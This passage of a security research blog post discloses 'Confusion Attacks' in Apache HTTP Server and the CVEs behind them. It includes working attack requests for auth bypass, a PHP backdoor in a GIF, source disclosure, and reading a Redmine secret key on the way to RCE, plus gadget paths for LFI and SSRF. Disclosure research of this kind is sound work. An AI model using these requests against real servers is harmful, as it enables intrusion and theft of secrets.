Friday, August 9, 2024

[EN] Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!


Orange Tsai (@orange_8361)  |  Traditional Chinese Version  |  English Version

Hey there! This is my research on Apache HTTP Server presented at Black Hat USA 2024. It will also be presented at HITCON and OrangeCon. If you’re interested in getting a preview, you can check the slides here:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Also, I would like to thank Akamai for their friendly outreach! They released mitigation measures immediately after this research was published (details can be found on Akamai’s blog).

TL;DR

This article explores architectural issues within the Apache HTTP Server, highlighting several technical debts within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. The content includes, but is not limited to:

  1. How a single ? can bypass Httpd’s built-in access control and authentication.
  2. How unsafe RewriteRules can escape the Web Root and access the entire filesystem.
  3. How to leverage a piece of code from 1996 to transform an XSS into RCE.

Before the Story

This section is just some personal murmurs. If you’re only interested in the technical details, jump straight to — How Did the Story Begin?

As a researcher, perhaps the greatest joy is seeing your work recognized and understood by peers. Therefore, after completing a significant piece of research with fruitful results, it is natural to want the world to see it, which is why I’ve presented multiple times at Black Hat USA and DEFCON. As you might know, since 2022 I have been unable to obtain a valid travel authorization to enter the U.S. (for Taiwan, travel authorization under the Visa Waiver Program can typically be obtained online within minutes to hours), which led me to miss the in-person talk at Black Hat USA 2022. Even on a solo trip to Machu Picchu and Easter Island in 2023, I couldn’t transit through the U.S. :(

To address this situation, I started preparing for a B1/B2 visa in January this year: writing various documents, interviewing at the embassy, and endlessly waiting. It’s not fun. But to have my work seen, I still spent a lot of time exploring every possibility. Even three weeks before the conference, it was unclear whether my talk would be canceled (BH only accepted in-person talks, but thanks to the RB, it could ultimately be presented in pre-recorded format). So, everything you see, including slides, videos, and this blog, was completed within just a few dozen days. 😖

As a pure researcher with a clear conscience, my attitude towards vulnerabilities has always been that they should be directly reported to and fixed by the vendor. I’m not writing these words for any particular reason, just to record some feelings of helplessness and my efforts this year, and to thank those who have helped me along the way. Thank you all :)

How Did the Story Begin?

Around the beginning of this year, I started thinking about my next research target. As you might know, I always aim to challenge big targets that can impact the entire internet, so I began searching for complex topics and interesting open-source projects like Nginx and PHP, and even delved into RFCs to strengthen my understanding of protocol details.

While most attempts ended in failure (though a few might become topics for future blog posts 😉), reading this code reminded me of a quick review I had done of Apache HTTP Server last year! Although I didn’t dive deep into the code back then because of my work schedule, I had already “smelled” something not quite right about its coding style.

So this year, I decided to continue on that research, transforming the “bad smells” from an indescribable “feeling” into concrete research on Apache HTTP Server!

Why Does Apache HTTP Server Smell Bad?

Firstly, the Apache HTTP Server is a world constructed by “modules,” as proudly declared in its official documentation regarding its modularity:

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

The entire Httpd service relies on hundreds of small modules working together to handle a client’s HTTP request. Among the 136 modules listed by the official documentation, about half are either enabled by default or frequently used by websites!

What’s even more surprising is that these modules also maintain a colossal request_rec structure while processing client HTTP requests. This structure includes all the elements involved in handling HTTP, with its detailed definition available in include/httpd.h. All modules depend on this massive structure for synchronization, communication, and data exchange. As an HTTP request passes through several phases, modules act like players in a game of catch, passing the structure from one to another. Each module even has the ability to modify any value in this structure according to its own preferences!

This type of collaboration is not new from a software engineering perspective. Each module simply focuses on its own task. As long as everyone finishes their work, then the client can enjoy the service provided by Httpd. This approach might work well with a few modules, but what happens when we scale it up to hundreds of modules collaborating — can they really work well together? 🤔

Our starting point is straightforward — the modules do not fully understand each other, yet they are required to cooperate. Each module might be implemented by different people, with the code undergoing years of iterations, refactors, and modifications. Do they really still know what they are doing? Even if they understand their own duty, what about other modules’ implementation details? Without any good development standards or guidelines, there must be several gaps that we can exploit!

A Whole New Attack — Confusion Attack

Based on these observations, we started focusing on the “relationships” and “interactions” among these modules. If a module accidentally modifies a structure field that it considers unimportant, but is crucial for another module, it could affect the latter’s decisions. Furthermore, if the definitions or semantics of the fields are not precise enough, causing ambiguities in how modules understand the same fields, it could lead to potential security risks as well!

From this starting point, we developed three different types of attacks. Since all of them are more or less related to the misuse of structure fields, we’ve named this attack surface “Confusion Attack.” The attacks we developed are:

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

Through these attacks, we have identified 9 different vulnerabilities:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

These vulnerabilities were reported through the official security mailing list and were addressed by the Apache HTTP Server in the 2.4.60 update published on 2024-07-01.

As this is a new attack surface rooted in Httpd’s architectural design and internal mechanisms, the first person to delve into it naturally finds the most vulnerabilities. Thus, I currently hold the most CVEs from Apache HTTP Server 😉. The fixes, however, lead to many updates that are not backward compatible, so patching these issues is not easy for many long-running production servers. If administrators update without careful consideration, they might disrupt existing configurations, causing service downtime. 😨

Now, it’s time to get started with our Confusion Attacks! Are you ready?

🔥 1. Filename Confusion

The first issue stems from confusion regarding the filename field. Literally, r->filename should represent a filesystem path. However, in Apache HTTP Server, some modules treat it as a URL. If, within an HTTP context, most modules consider r->filename as a filesystem path but some others treat it as a URL, this inconsistency can lead to security issues!

⚔️ Primitive 1-1. Truncation

So, which modules treat r->filename as a URL? The first is mod_rewrite, which allows sysadmins to easily rewrite a path pattern to a specified substitution target using the RewriteRule directive:

RewriteRule Pattern Substitution [flags]

The target can be either a filesystem path or a URL. This feature likely exists for user experience. However, this “convenience” also introduces risks. For instance, while rewriting the target paths, mod_rewrite forcibly treats all results as URLs, truncating the path at a question mark (sent URL-encoded as %3F). This leads to the following two exploitations.

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;
    
    // [...]
    
    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);
        
        // [...] do the remaining stuff
        
    }
    
    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);         // <------- [!!!] Truncate the `r->filename`
    
    // [...]
}

✔️ 1-1-1. Path Truncation

The first primitive leverages this truncation on the filesystem path. Imagine the following RewriteRule:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

The server would open the corresponding profile based on the username followed by the path /user/, for example:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

Since mod_rewrite forcibly treats every rewritten result as a URL, even when the target is a filesystem path, the result can be truncated at a question mark, cutting off the trailing /profile.yml, like:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

This is our first primitive — Path Truncation. Let’s pause our exploration of this primitive here for a moment. Although it might seem like a minor flaw for now, remember it— it will reappear in later attacks, gradually tearing open this seemingly little breach! 😜
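
The truncation can be modelled in a few lines of Python. This is a minimal sketch, not mod_rewrite's real logic: `PATTERN`, `SUBSTITUTION`, and `rewrite()` are hypothetical names standing in for the rule above, and the model assumes the request path is URL-decoded before the rule runs.

```python
import re
from urllib.parse import unquote

# Hypothetical stand-ins for the RewriteRule shown above.
PATTERN = re.compile(r"^/user/(.+)$")
SUBSTITUTION = "/var/user/{0}/profile.yml"

def rewrite(request_path: str) -> str:
    """Decode the path, apply the rule, then split the result at the first '?'."""
    decoded = unquote(request_path)            # %2F -> '/', %3F -> '?'
    match = PATTERN.match(decoded)
    if match is None:
        return decoded
    substituted = SUBSTITUTION.format(match.group(1))
    # The result is treated as a URL, so everything from '?' on is dropped
    # from the filename and would become the query string.
    filename, _, _query = substituted.partition("?")
    return filename

print(rewrite("/user/orange"))
print(rewrite("/user/orange%2Fsecret.yml%3F"))
```

The second call shows the suffix `/profile.yml` landing on the query side of the split, so it never reaches the filename.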

✔️ 1-1-2. Mislead RewriteFlag Assignment

The second exploitation of the truncation primitive is to mislead the assignment of RewriteFlags. Imagine a sysadmin managing websites and their corresponding handlers through the following RewriteRule:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

If a request ends with the .php extension, it adds the corresponding handler for the mod_php (this can also be an Environment Variable or Content-Type; you can refer to the official RewriteRule Flags manual for details).

Since the truncation behavior of the mod_rewrite occurs after the regular expression match, an attacker can use the original rule to apply flags to requests they shouldn’t apply to by using a ?. For example, an attacker could upload a GIF image embedded with malicious PHP code and execute it as a backdoor through the following crafted request:

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;?>

$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
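
The ordering problem (match first, truncate afterwards) can be sketched as follows. This is a simplified model under the same assumptions as before; `apply_rule()` is a hypothetical helper, not part of Httpd.

```python
import re
from urllib.parse import unquote

RULE = re.compile(r"^(.+\.php)$")   # pattern from the rule above

def apply_rule(request_path: str):
    """Return (filename, handler) for a request in this simplified model."""
    decoded = unquote(request_path)
    filename, handler = decoded, None
    match = RULE.match(decoded)
    if match:
        # The [H=...] flag is applied because the pattern matched ...
        handler = "application/x-httpd-php"
        # ... and only afterwards is the substitution cut at '?'.
        filename = match.group(1).partition("?")[0]
    return filename, handler

print(apply_rule("/upload/1.gif"))
print(apply_rule("/upload/1.gif%3fooo.php"))
```

In the second call the pattern sees a path ending in `.php`, yet the file that ends up being served is the GIF.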

⚔️ Primitive 1-2. ACL Bypass

The second primitive of Filename Confusion occurs in mod_proxy. Unlike the previous primitive, which treats targets as URLs in all cases, this time the authentication and access control bypass is caused by the inconsistent semantics of r->filename among the modules!

It actually makes sense for mod_proxy to treat r->filename as a URL, given that the primary purpose of a proxy is to “redirect” requests to other URLs. However, security issues arise when different components interact. Most modules treat r->filename as a filesystem path by default, so imagine you use file-based access control while mod_proxy treats r->filename as a URL: this inconsistency can lead to an access control or authentication bypass!

A classic example is when sysadmins use the Files directive to restrict a single file, like admin.php:

<Files "admin.php">
    AuthType Basic 
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

This type of configuration can be bypassed directly under the default PHP-FPM installation! It’s also worth mentioning that this is one of the most common ways to configure authentication in Apache HTTP Server! Suppose you visit a URL like this:

http://server/admin.php%3Fooo.php

First, in the HTTP lifecycle at this URL, the authentication module will compare the requested filename with the protected files. At this point, the r->filename field is admin.php?ooo.php, which obviously does not match admin.php, so the module will assume that the current request does not require authentication. However, the PHP-FPM configuration is set to forward requests ending in .php to the mod_proxy using the SetHandler directive:

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

The mod_proxy will rewrite r->filename to the following URL and call the sub-module mod_proxy_fcgi to handle the subsequent FastCGI protocol:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Since the backend receives the filename in a strange format, PHP-FPM has to handle this behavior specially. The logic of this handling is as follows:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p =0;
    }
}

As you can see, PHP-FPM first normalizes the filename and splits it at the question mark ? to extract the actual file path for execution (which is /var/www/html/admin.php). This leads to the bypass, and basically, all authentications or access controls based on the Files directive for a single PHP file are at risk when running together with PHP-FPM! 😮
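
The disagreement between the two sides can be sketched like this. `needs_auth()` is a hypothetical stand-in for a `<Files>`-style check that compares the last path component literally, and `fpm_script_path()` mirrors the PHP-FPM excerpt above; both are simplified models rather than the real implementations.

```python
import posixpath

PROTECTED = {"admin.php"}   # names guarded by <Files> in this model

def needs_auth(filename: str) -> bool:
    """Compare the last path component against the protected names."""
    return posixpath.basename(filename) in PROTECTED

def fpm_script_path(script_filename: str) -> str:
    """Drop the proxy prefix and host, then cut at '?', like the excerpt."""
    prefix = "proxy:fcgi://"
    if script_filename.lower().startswith(prefix):
        rest = script_filename[len(prefix):]
        slash = rest.find("/")
        if slash != -1:
            script_filename = rest[slash:]      # skip hostname and port
        script_filename = script_filename.partition("?")[0]
    return script_filename

requested = "/var/www/html/admin.php?ooo.php"
print(needs_auth(requested))
print(fpm_script_path("proxy:fcgi://127.0.0.1:9000" + requested))
```

The check sees a file named `admin.php?ooo.php`, while the backend executes `/var/www/html/admin.php`.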

Many potentially risky configurations can be found on GitHub, such as phpinfo() restricted to internal network access only:

# protect phpinfo, only allow localhost and local network access
<Files php-info.php>
    # LOCAL ACCESS ONLY
    # Require local 

    # LOCAL AND LAN ACCESS
    Require ip 10 172 192.168
</Files>

Adminer blocked by .htaccess:

<Files adminer.php>
    Order Allow,Deny
    Deny from all
</Files>

Protected xmlrpc.php:

<Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
</Files>

CLI tools prevented from direct access:

<Files "cron.php">
    Deny from all
</Files>

Through an inconsistency in how the authentication module and mod_proxy interpret the r->filename field, all the above examples can be successfully bypassed with just a ?.

🔥 2. DocumentRoot Confusion

The next attack we’re diving into is the confusion based on DocumentRoot! Let’s consider this Httpd configuration for a moment:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

When you visit the URL http://server/html/about, which file do you think Httpd actually opens? Is it the one under the root directory, /about.html, or is it from the DocumentRoot at /var/www/html/about.html?

The answer is — it accesses both paths. Yep, that’s our second Confusion Attack. For any[1] RewriteRule, Apache HTTP Server always tries to open both the path with DocumentRoot and without it! Amazing, right? 😉

[1] Located within Server Config or VirtualHost Block

Path: modules/mappers/mod_rewrite.c#L4939

    if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {     // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}
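
The double lookup in the excerpt above can be approximated as follows. This sketch assumes that the check only looks at whether the first path segment exists, which is what the title of CVE-2024-38475 suggests. The set `existing_roots` is a hypothetical stand-in for the filesystem check, and the `uri_reduced` condition is ignored.

```python
import posixpath

def resolve(rewritten: str, docroot: str, existing_roots: set) -> str:
    """Pick the path served for a rewritten target (simplified model)."""
    first_segment = rewritten.lstrip("/").split("/", 1)[0]
    # [1] If the first path segment exists on disk, keep the absolute path.
    if first_segment in existing_roots:
        return rewritten
    # [2] Otherwise fall back to prefixing the DocumentRoot.
    return posixpath.join(docroot, rewritten.lstrip("/"))

ROOTS = {"usr", "etc", "var"}   # assumed top-level entries on the host
print(resolve("/about.html", "/var/www/html", ROOTS))
print(resolve("/usr/share/doc/index.html", "/var/www/html", ROOTS))
```

The second path is only an illustrative example; any target whose first segment exists on the host takes branch [1].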

Most of the time, the version without DocumentRoot doesn’t exist, so Apache HTTP Server goes for the version with the DocumentRoot. But this behavior already lets us “intentionally” access paths outside the Web Root. If we can control the prefix of the RewriteRule target, couldn’t we access any file on the system? That’s the spirit of our second Confusion Attack! You can find numerous problematic configurations on GitHub, and even the examples from the official Apache HTTP Server documentation are vulnerable to attacks:

# Remove mykey=???
RewriteCond "%{QUERY_STRING}" "(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"
RewriteRule "(.*)" "$1?%1%3"

Other RewriteRules are also affected, such as rules based on caching needs or hiding file extensions:

RewriteRule  "^/html/(.*)$"  "/$1.html"

The Rule trying to save bandwidth by opting for compressed versions of static files:

RewriteRule  "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

The rule redirecting old URLs to the main site:

RewriteRule  "^/oldwebsite/(.*)$"  "/$1"

The rule returning a 200 OK for all CORS preflight requests:

RewriteCond %{REQUEST_METHOD} OPTIONS
RewriteRule ^(.*)$ $1 [R=200,L]

Theoretically, as long as the target prefix of a RewriteRule is controllable, we can access nearly the entire filesystem. But from the real-world cases above, extensions like .html and .gz are the restrictions that keep us from being truly free. So, can we access files other than .html? Remember the Path Truncation primitive from Filename Confusion earlier? By combining these two primitives, we can freely access arbitrary files on the filesystem!

The following demonstrations are all based on this unsafe RewriteRule:

RewriteEngine On
RewriteRule  "^/html/(.*)$"  "/$1.html"
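
Chaining this rule with Path Truncation can be sketched as below. It is a simplified model under stated assumptions: `TOP_LEVEL` and `DOCROOT` are assumed values, `serve_path()` is a hypothetical helper, and access control is not modelled at all.

```python
import re
from urllib.parse import unquote

RULE = re.compile(r"^/html/(.*)$")    # the unsafe rule above
TOP_LEVEL = {"usr", "etc", "var"}     # assumed to exist on the host
DOCROOT = "/var/www/html"             # assumed DocumentRoot

def serve_path(request_path: str) -> str:
    """Return the filesystem path this model would try to open."""
    decoded = unquote(request_path)
    match = RULE.match(decoded)
    if match is None:
        return DOCROOT + decoded
    target = "/" + match.group(1) + ".html"
    target = target.partition("?")[0]             # Path Truncation drops ".html"
    first_segment = target.lstrip("/").split("/", 1)[0]
    if first_segment in TOP_LEVEL:                # DocumentRoot Confusion
        return target
    return DOCROOT + target

print(serve_path("/html/about"))
print(serve_path("/html/usr/lib/cgi-bin/download.cgi"))
print(serve_path("/html/usr/lib/cgi-bin/download.cgi%3F"))
```

Only the third request gets rid of the forced `.html` suffix, which is why the two primitives are needed together.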

⚔️ Primitive 2-1. Server-Side Source Code Disclosure

Let’s introduce the first primitive of DocumentRoot Confusion — Arbitrary Server-Side Source Code Disclosure!

Since Apache HTTP Server decides whether to treat a file as a server-side script based on the current directory or virtual host configuration, accessing the target via an absolute path can confuse Httpd’s logic, causing it to leak contents that should have been executed as code.

✔️ 2-1-1. Disclose CGI Source Code

Starting with the disclosure of server-side CGI source code, since mod_cgi binds the CGI folder to a specified URL prefix via ScriptAlias, directly accessing a CGI file using its absolute path can leak its source code due to the change of URL prefix.

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi
$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl
 # use CGI;
 # ...
 # # the source code of download.cgi

✔️ 2-1-2. Disclose PHP Source Code

Next is the disclosure of server-side PHP source code. Given that PHP has numerous use cases, if PHP environments are applied only to specific directories or virtual hosts (which is common in web hosting), accessing PHP files through a virtual host that doesn’t support PHP can disclose the source code!

For example, www.local and static.local are two websites hosted on the same server; www.local allows PHP execution while static.local only serves static files. Hence, you can disclose sensitive info from config.php like this:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php
$ curl http://www.local/html/var/www.local/config.php%3F -H "Host: static.local"
 # the source code of config.php

⚔️ Primitive 2-2. Local Gadgets Manipulation!

Next up is our second primitive — Local Gadgets Manipulation.

First, when we talked about “accessing any file on the filesystem,” did you wonder: “Hey, could an unsafe RewriteRule access /etc/passwd?” The answer is Yes, and also no. What?

Technically, the server does check if /etc/passwd exists, but Apache HTTP Server’s built-in access control blocks our access. Here’s a snippet from Apache HTTP Server’s configuration template:

<Directory />
    AllowOverride None
    Require all denied
</Directory>

You’ll notice it blocks access to the root directory / by default (Require all denied). So our “arbitrary file access” ability seems a bit less “arbitrary.” Does that mean the show’s over? Not really! We have already broken the assumption that only the DocumentRoot is accessible, which is a significant step forward!

A closer inspection of different Httpd distributions reveals that Debian/Ubuntu operating systems by default allow /usr/share:

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

So, the next step is to “squeeze” all possibilities within this directory. All available resources, such as existing tutorials, documentation, unit test files, and even files shipped with programming languages like PHP and Python or with PHP modules, could become targets for our abuse!
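
How the two Directory blocks above interact can be sketched as follows. This is a simplified model that assumes sections are applied from the shortest directory to the longest and that a later `Require` replaces an earlier one; `DIRECTORY_RULES` and `is_allowed()` are hypothetical names.

```python
import posixpath

# (directory, granted?) pairs taken from the two snippets above.
DIRECTORY_RULES = [("/", False), ("/usr/share", True)]

def is_allowed(path: str) -> bool:
    """Apply matching sections from shortest to longest; the last one wins."""
    path = posixpath.normpath(path)
    decision = False
    for directory, granted in sorted(DIRECTORY_RULES, key=lambda rule: len(rule[0])):
        prefix = directory.rstrip("/") + "/"
        if path == directory or path.startswith(prefix):
            decision = granted
    return decision

print(is_allowed("/etc/passwd"))
print(is_allowed("/usr/share/doc/websocketd/examples/php/dump-env.php"))
```

Anything under `/usr/share` is granted by the more specific block, while the rest of the filesystem stays denied.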

P.S. Of course, the exploitation here is based on the Httpd distributed by Ubuntu/Debian operating systems. However, in practice, we have also found that some applications remove the Require all denied line from the root directory, allowing direct access to /etc/passwd.

✔️ 2-2-1. Local Gadget to Information Disclosure

Let’s hunt for potentially exploitable files in this directory. First off, if the target Apache HTTP Server has the websocketd service installed, the default package includes an example PHP script dump-env.php under /usr/share/doc/websocketd/examples/php/. If there’s a PHP environment on the target server, this script can be accessed directly to leak sensitive environment variables.

Additionally, if the target has services like Nginx or Jetty installed, though /usr/share is theoretically a read-only copy for package installation, these services still place their default Web Roots under /usr/share, making it possible to leak sensitive web application information, such as the web.xml in Jetty.

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

Here’s a simple demonstration using setup.php from the Davical package, which exists as a read-only copy, to leak contents of phpinfo().

✔️ 2-2-2. Local Gadget to XSS

Next, how to turn this primitive into XSS? On the Ubuntu Desktop environment, LibreOffice, an open-source office suite, is installed by default. We can leverage the language switch feature in the help files to achieve XSS.

Path: /usr/share/libreoffice/help/help.html

    var url = window.location.href;
    var n = url.indexOf('?');
    if (n != -1) {
        // the URL came from LibreOffice help (F1)
        var version = getParameterByName("Version", url);
        var query = url.substr(n + 1, url.length);
        var newURL = version + '/index.html?' + query;
        window.location.replace(newURL);
    } else {
        window.location.replace('latest/index.html');
    }

Thus, even if the target hasn’t deployed any web application, we can still create XSS using an unsafe RewriteRule through files that come within the operating system.
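
Why the redirect in help.html is attacker-controlled can be seen in a Python rendering of its string handling. This is a sketch with assumptions: `parse_qs` stands in for `getParameterByName()`, whose body is not shown above, and the `javascript:` value is only an illustrative input, not a payload taken from the research.

```python
from urllib.parse import parse_qs

def redirect_target(url: str) -> str:
    """Approximate the URL that help.html passes to window.location.replace()."""
    n = url.find("?")
    if n == -1:
        return "latest/index.html"
    query = url[n + 1:]
    # parse_qs stands in for getParameterByName() (an assumption).
    version = parse_qs(query).get("Version", [""])[0]
    return version + "/index.html?" + query

print(redirect_target("http://server/help.html?Version=7.3"))
print(redirect_target("http://server/help.html?Version=javascript:alert(1)//"))
```

Because the `Version` parameter becomes the start of the new location, the caller decides the scheme of the redirect target.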

✔️ 2-2-3. Local Gadget to LFI

What about arbitrary file reading? If the target server has PHP or frontend packages installed, like JpGraph, jQuery-jFeed, or even WordPress or Moodle plugins, their tutorials or debug consoles can become our gadgets, for example:

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Here’s a simple example exploiting proxy.php from jQuery-jFeed to read /etc/passwd:

✔️ 2-2-4. Local Gadget to SSRF

Finding an SSRF vulnerability is also a piece of cake. For instance, MagpieRSS offers a magpie_debug.php file, which is a fabulous gadget for exploitation:

  • /usr/share/php/magpierss/scripts/magpie_debug.php

✔️ 2-2-5. Local Gadget to RCE

So, can we achieve RCE? Hold on, let’s take it step by step! First, this primitive lets us reapply all known existing attacks. For example, an old version of PHPUnit left behind by development or third-party dependencies can be directly exploited using CVE-2017-9841 to execute arbitrary code. Another example is phpLiteAdmin installed as a read-only copy, which has the default password admin. By now, you should see the vast potential of Local Gadgets Manipulation. What remains is to discover even more powerful and universal gadgets!

⚔️ Primitive 2-3. Jailbreak from Local Gadgets

You might ask: “Can’t we really break out of /usr/share?” Of course we can, and that brings us to our third primitive: Jailbreak from /usr/share!

In Debian/Ubuntu distributions of Httpd, the FollowSymLinks option is explicitly enabled by default. Even in non-Debian/Ubuntu versions, Apache HTTP Server also implicitly allows Symbolic Links by default.

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>

✔️ 2-3-1. Jailbreak from Local Gadgets

So, any package that has a Symbolic Link in its installation directory pointing outside of /usr/share can become a stepping-stone to access more gadgets for further exploitation. Here are some useful Symbolic Links we’ve discovered so far:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
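
The effect of such links can be reproduced in a throwaway directory. This is a minimal sketch: the `usr/share/app` and `etc/app` layout is a hypothetical stand-in for a package directory and its configuration directory, and `escapes()` is an illustrative helper.

```python
import os
import tempfile

def escapes(base: str, path: str) -> bool:
    """True if `path`, once symlinks are resolved, lies outside `base`."""
    real_base = os.path.realpath(base)
    real_path = os.path.realpath(path)
    return os.path.commonpath([real_base, real_path]) != real_base

def demo():
    """Build a tiny tree with one symlink and test two paths under it."""
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "usr", "share")
        package = os.path.join(share, "app")       # stands in for /usr/share/<pkg>
        outside = os.path.join(tmp, "etc", "app")  # stands in for /etc/<pkg>
        os.makedirs(package)
        os.makedirs(outside)
        os.symlink(outside, os.path.join(package, "config"))
        plain = escapes(share, os.path.join(package, "README"))
        linked = escapes(share, os.path.join(package, "config", "secret_key.txt"))
        return plain, linked

print(demo())
```

A path that looks like it sits under the allowed directory resolves elsewhere as soon as one component is a symbolic link.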

✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

To wrap up our jailbreak primitive, let’s showcase how to perform an RCE using a double-hop Symbolic Link in Redmine. In the default installation of Redmine, there’s an instances/ folder pointing to /var/lib/redmine/, and within /var/lib/redmine/, the default/config/ folder points to the /etc/redmine/default/ directory, which holds Redmine’s database setting and secret key.

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/default/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

Thus, through an insecure RewriteRule and two Symbolic Links, we can easily access the application secret key used by Redmine:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

And since Redmine is a Ruby on Rails application, the content of secret_key.txt is actually the key used for signing and encrypting. The next step should be familiar to those who have attacked RoR before: by embedding malicious Marshal objects, signed and encrypted with the known keys, into cookies, and then achieving remote code execution through Server-Side Deserialization!
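
Why a leaked signing key matters can be shown with a generic HMAC sketch. This is not Rails' actual cookie format or key derivation; `sign()` and `verify()` are hypothetical helpers that only illustrate that whoever holds the key can produce tags the server accepts.

```python
import hashlib
import hmac

def sign(payload: bytes, key: bytes) -> str:
    """Return a hex HMAC-SHA256 tag over the payload."""
    return hmac.new(key, payload, hashlib.sha256).hexdigest()

def verify(payload: bytes, tag: str, key: bytes) -> bool:
    """Constant-time check that the tag was produced with this key."""
    return hmac.compare_digest(sign(payload, key), tag)

SERVER_KEY = b"6d222c3c3a1881c865428edb79a74405"   # value from the output above
forged = b"attacker-chosen payload"
print(verify(forged, sign(forged, SERVER_KEY), SERVER_KEY))      # tag made with the leaked key
print(verify(forged, sign(forged, b"guessed key"), SERVER_KEY))  # tag made without it
```

The signature proves only possession of the key, so once the key is readable the server can no longer tell its own cookies from forged ones.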

🔥 3. Handler Confusion

The final attack I’m going to introduce is the confusion based on Handler. This attack also leverages a piece of technical debt that has been left over from the legacy architecture of Apache HTTP Server. Let’s quickly understand this technical debt through an example — if today you want to run the classic mod_php on Apache HTTP Server, which of the following two directives do you use?

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

